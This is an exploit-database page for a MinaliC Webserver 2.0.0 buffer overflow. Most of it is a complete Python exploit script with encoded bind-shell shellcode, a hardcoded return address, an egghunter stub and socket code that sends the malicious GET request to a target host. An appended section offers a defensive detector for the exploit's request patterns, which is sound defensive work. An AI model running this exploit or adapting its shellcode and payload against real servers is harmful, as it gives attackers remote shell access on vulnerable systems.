MinaliC Webserver buffer overflow (egghunter) - exploit.company
Vendor: MinaliC Webserver
By: PuN1sh3r
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: MinaliC Webserver
Affected Version From: MinaliC Webserver 2.0.0
Affected Version To: MinaliC Webserver 2.0.0
Patch Exists: NO
Platforms Tested: Windows XP Pro SP3
Year: 2013

MinaliC Webserver buffer overflow (egghunter)

Remote command execution by triggering a buffer overflow in the GET request; an egghunter is then used to locate the shellcode staged elsewhere in the same request in order to attain a shell.

Mitigation:

Apply the latest patch or upgrade to a newer version of MinaliC Webserver.

Exploit-DB raw data:

#!/usr/bin/env python

# Exploit Title: MinaliC Webserver buffer overflow (egghunter)
# Date: August 13 2013
# Exploit Author: PuN1sh3r
# Email: luiguibiker@gmail.com
# Vendor Homepage: http://minalic.sourceforge.net/
# Version: MinaliC Webserver 2.0.0
# Tested on: Windows XP Pro SP3, English
#
# Description:
# Remote command execution by triggering a buffer overflow in the GET
# request along with some buffer gymnastics using egghunters in order to attain a shell.
# gr33zt to superkojiman for the initial exploit

import socket
# windows/shell_bind_tcp  http://www.metasploit.com
# * VERBOSE=false, LPORT=443, RHOST=, EXITFUNC=process,InitialAutoRunScript=, AutoRunScript=

shellcode = (
"\x89\xe7\xda\xc0\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x49\x6c\x49\x78\x6b\x39\x37\x70\x33\x30\x77\x70\x43\x50\x4d"
"\x59\x38\x65\x44\x71\x6b\x62\x73\x54\x6e\x6b\x61\x42\x34\x70"
"\x4c\x4b\x43\x62\x74\x4c\x6c\x4b\x36\x32\x56\x74\x4c\x4b\x72"
"\x52\x75\x78\x44\x4f\x68\x37\x70\x4a\x67\x56\x66\x51\x4b\x4f"
"\x34\x71\x4b\x70\x4c\x6c\x55\x6c\x61\x71\x51\x6c\x63\x32\x76"
"\x4c\x77\x50\x4b\x71\x4a\x6f\x34\x4d\x47\x71\x58\x47\x5a\x42"
"\x58\x70\x70\x52\x33\x67\x4c\x4b\x53\x62\x52\x30\x4e\x6b\x30"
"\x42\x65\x6c\x57\x71\x68\x50\x4c\x4b\x77\x30\x62\x58\x6d\x55"
"\x49\x50\x71\x64\x30\x4a\x56\x61\x5a\x70\x42\x70\x4c\x4b\x52"
"\x68\x66\x78\x6c\x4b\x42\x78\x45\x70\x56\x61\x6a\x73\x79\x73"
"\x35\x6c\x77\x39\x4c\x4b\x77\x44\x6c\x4b\x76\x61\x4e\x36\x65"
"\x61\x6b\x4f\x34\x71\x69\x50\x4e\x4c\x7a\x61\x38\x4f\x54\x4d"
"\x63\x31\x4a\x67\x76\x58\x79\x70\x34\x35\x6a\x54\x55\x53\x61"
"\x6d\x7a\x58\x35\x6b\x61\x6d\x31\x34\x43\x45\x58\x62\x30\x58"
"\x4c\x4b\x73\x68\x44\x64\x47\x71\x6e\x33\x62\x46\x4c\x4b\x66"
"\x6c\x30\x4b\x4e\x6b\x32\x78\x55\x4c\x63\x31\x48\x53\x4c\x4b"
"\x63\x34\x4e\x6b\x75\x51\x38\x50\x4b\x39\x62\x64\x61\x34\x71"
"\x34\x61\x4b\x63\x6b\x61\x71\x63\x69\x53\x6a\x76\x31\x59\x6f"
"\x4d\x30\x33\x68\x31\x4f\x30\x5a\x4c\x4b\x37\x62\x48\x6b\x4d"
"\x56\x63\x6d\x53\x58\x36\x53\x70\x32\x73\x30\x57\x70\x32\x48"
"\x74\x37\x71\x63\x37\x42\x33\x6f\x43\x64\x73\x58\x30\x4c\x61"
"\x67\x45\x76\x76\x67\x79\x6f\x58\x55\x38\x38\x6e\x70\x65\x51"
"\x63\x30\x33\x30\x57\x59\x4b\x74\x31\x44\x76\x30\x51\x78\x54"
"\x69\x4f\x70\x52\x4b\x33\x30\x6b\x4f\x79\x45\x56\x30\x32\x70"
"\x76\x30\x56\x30\x43\x70\x56\x30\x53\x70\x36\x30\x51\x78\x49"
"\x7a\x54\x4f\x59\x4f\x79\x70\x4b\x4f\x4a\x75\x6d\x59\x6b\x77"
"\x54\x71\x4b\x6b\x76\x33\x65\x38\x76\x62\x73\x30\x45\x51\x4d"
"\x6b\x4c\x49\x4a\x46\x53\x5a\x64\x50\x71\x46\x50\x57\x52\x48"
"\x68\x42\x4b\x6b\x34\x77\x65\x37\x4b\x4f\x4e\x35\x33\x63\x42"
"\x77\x35\x38\x38\x37\x6b\x59\x44\x78\x6b\x4f\x49\x6f\x6e\x35"
"\x33\x63\x73\x63\x50\x57\x65\x38\x64\x34\x7a\x4c\x45\x6b\x6d"
"\x31\x59\x6f\x79\x45\x61\x47\x6e\x69\x6a\x67\x65\x38\x70\x75"
"\x52\x4e\x62\x6d\x63\x51\x79\x6f\x48\x55\x51\x78\x53\x53\x42"
"\x4d\x51\x74\x65\x50\x6e\x69\x6a\x43\x36\x37\x53\x67\x53\x67"
"\x50\x31\x39\x66\x50\x6a\x45\x42\x62\x79\x43\x66\x48\x62\x59"
"\x6d\x72\x46\x78\x47\x37\x34\x37\x54\x47\x4c\x33\x31\x65\x51"
"\x4e\x6d\x57\x34\x64\x64\x54\x50\x59\x56\x57\x70\x70\x44\x33"
"\x64\x70\x50\x73\x66\x61\x46\x33\x66\x67\x36\x53\x66\x50\x4e"
"\x42\x76\x43\x66\x72\x73\x56\x36\x62\x48\x71\x69\x48\x4c\x45"
"\x6f\x6d\x56\x59\x6f\x78\x55\x4c\x49\x49\x70\x42\x6e\x30\x56"
"\x47\x36\x59\x6f\x66\x50\x72\x48\x63\x38\x4d\x57\x65\x4d\x33"
"\x50\x6b\x4f\x4e\x35\x4d\x6b\x48\x70\x48\x35\x4f\x52\x63\x66"
"\x72\x48\x4f\x56\x4c\x55\x6d\x6d\x4f\x6d\x39\x6f\x5a\x75\x57"
"\x4c\x33\x36\x71\x6c\x37\x7a\x4d\x50\x79\x6b\x59\x70\x72\x55"
"\x54\x45\x4d\x6b\x43\x77\x55\x43\x72\x52\x42\x4f\x61\x7a\x57"
"\x70\x36\x33\x49\x6f\x5a\x75\x41\x41"
)
# Return address note:
# 77C11F13  JMP EBX in msvcrt.dll, Windows XP SP3 English
ret = "\x13\x1F\xC1\x77"
junk = "\x41" * 245 + ret
host = "\x90" * 30 + "A" * 40  + "\x90" * 31

egg =  "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 
buf = "GET /" + junk + " HTTP/1.1\r\n" + "Host: " + "\x90" * (100 - len(egg)) + egg     + "\r\n"
buf += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buf += "User-Agent: " + "T00W" + "T00W" +  "\x90" * (900 - len(shellcode)) + shellcode  + "\r\n\r\n" 
print buf
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.5", 8080))
s.send(buf)
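A defender-side check, added here as an example and not part of the original exploit or of the MinaliC project: it parses a raw HTTP request and flags the markers this exploit relies on (an oversized, low-entropy request path, NOP sleds in headers, and the doubled T00W egg tag the egghunter scans memory for). The alert thresholds and both sample requests are constructed assumptions; the attack sample keeps the exploit's header layout but uses 0xCC filler in place of real code.

```python
import re
from collections import Counter

# Assumed thresholds (not from the exploit): the overflow needs a path of a
# few hundred bytes, so 200 is a conservative alert threshold.
MAX_PATH_LEN = 200
NOP_SLED_RE = re.compile(rb"\x90{16,}")      # 16+ consecutive x86 NOP bytes
EGG_TAG_RE = re.compile(rb"(?:T00W){2}")     # doubled egg marker "T00WT00W"
NONPRINT_RE = re.compile(rb"[^\x09\x20-\x7e]")


def parse_request(raw):
    """Split a raw HTTP/1.x request head into (method, path, headers dict)."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        raise ValueError("malformed request line")
    method, path, _version = parts
    headers = {}
    for line in lines[1:]:
        if b":" in line:
            name, value = line.split(b":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def egghunter_indicators(raw):
    """Return the reasons a request looks like the MinaliC egghunter exploit."""
    reasons = []
    _method, path, headers = parse_request(raw)
    # Overflow trigger: a long path dominated by a single filler byte.
    top = Counter(path).most_common(1)[0][1]
    if len(path) > MAX_PATH_LEN and top > 0.8 * len(path):
        reasons.append("oversized low-entropy request path (%d bytes)" % len(path))
    for name, value in headers.items():
        label = name.decode("ascii", "replace")
        if NOP_SLED_RE.search(value):
            reasons.append("NOP sled in %s header" % label)
        if EGG_TAG_RE.search(value):
            reasons.append("doubled egg tag in %s header" % label)
        if name == b"host" and NONPRINT_RE.search(value):
            reasons.append("non-printable bytes in Host header")
    return reasons


# Constructed samples: the attack one mirrors the exploit's layout (long path,
# padded Host, tagged User-Agent) with 0xCC placeholders instead of real code.
SAMPLE_ATTACK = (b"GET /" + b"A" * 249 + b" HTTP/1.1\r\n"
                 b"Host: " + b"\x90" * 68 + b"\xcc" * 32 + b"\r\n"
                 b"User-Agent: T00WT00W" + b"\x90" * 40 + b"\xcc" * 8 + b"\r\n\r\n")
SAMPLE_BENIGN = (b"GET /index.html HTTP/1.1\r\nHost: 192.168.1.5:8080\r\n"
                 b"User-Agent: Mozilla/5.0\r\n\r\n")
```

Run `egghunter_indicators` over captured request heads (for example from a reverse proxy or IDS tap) and alert on any non-empty result; a single hit is worth a look, and a path hit combined with a header hit is a strong signal.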